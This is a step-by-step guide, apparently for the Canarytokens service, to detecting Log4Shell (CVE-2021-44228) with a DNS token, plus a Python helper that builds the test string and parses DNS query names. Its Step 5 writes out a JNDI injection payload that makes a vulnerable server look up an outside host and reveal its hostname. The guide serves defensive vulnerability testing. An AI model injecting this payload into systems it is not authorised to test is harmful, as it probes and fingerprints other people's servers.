You can use the DNS Canarytoken to help you test for CVE-2021-44228.
Step 1: Click the Canarytoken tile
On your console, click Add new Canarytoken.
Step 2: Select DNS token
Select the DNS token.
Step 3: Enter token reminder
Enter a reminder note for the token (Note: we used "Testing log4shell #1").
Step 4: Copy token
The server will generate a DNS-based token for you. Copy this token.
Step 5: Deploy the token
Place this copied token in the jndi:ldap string as follows:
${jndi:ldap://x${hostName}.L4J.INSERT-COPIED-STRING-HERE/a}
For example, the updated string will look as follows:
${jndi:ldap://x${hostName}.L4J.v52p1gxtas0p238iu99vj9rpx.c7b9c059bd9a.o3n.io/a}
Place the resulting string into search boxes and other fields whose contents will be parsed by your logging libraries. If one of them is vulnerable, you will receive a notification that includes the hostname of the vulnerable server.
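
The following Python sketch is an added example, not part of the original guide or of the Canarytokens product. It fills the Step 5 string with a validated token and recovers the reporting hostname from a queried DNS name. The function names and the sample query names are constructed for illustration, and it assumes the alert or your DNS logs give you the full queried name.

```python
import re

# One DNS label: letters, digits and hyphens, not starting or ending with a hyphen.
LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOSTNAME_RE = re.compile(r"^%s(?:\.%s)+$" % (LABEL, LABEL))


def _clean(name):
    # Drop surrounding whitespace and the optional trailing root dot.
    return name.strip().rstrip(".")


def build_test_string(token):
    """Insert the copied token into the Step 5 string. Rejects anything that
    is not a plain DNS name (a pasted URL, spaces, braces)."""
    token = _clean(token)
    if len(token) > 253 or not HOSTNAME_RE.match(token):
        raise ValueError("token is not a DNS hostname: %r" % token)
    return "${jndi:ldap://x${hostName}.L4J." + token + "/a}"


def reporting_host(query_name, token):
    """Return the hostname carried in a query of the form
    x<hostName>.L4J.<token>, or None if the name has another shape."""
    name = _clean(query_name).lower()          # DNS names are case-insensitive
    suffix = ".l4j." + _clean(token).lower()
    if not name.endswith(suffix):
        return None                            # e.g. a lookup of the bare token
    prefix = name[: -len(suffix)]
    if not prefix.startswith("x"):
        return None                            # not produced by the Step 5 string
    return prefix[1:]                          # "" if hostName expanded to nothing


# Constructed sample query names, using the example token from Step 5.
TOKEN = "v52p1gxtas0p238iu99vj9rpx.c7b9c059bd9a.o3n.io"
SAMPLE_QUERIES = [
    "xweb01.L4J." + TOKEN,
    "XAPP-02.corp.example.l4j." + TOKEN.upper() + ".",
    TOKEN,
]

if __name__ == "__main__":
    print(build_test_string(TOKEN))
    for q in SAMPLE_QUERIES:
        print(q, "->", reporting_host(q, TOKEN))
```

A result of None for a query means the token was resolved without the x<hostName>.L4J. prefix, so that hit did not come from the Step 5 string.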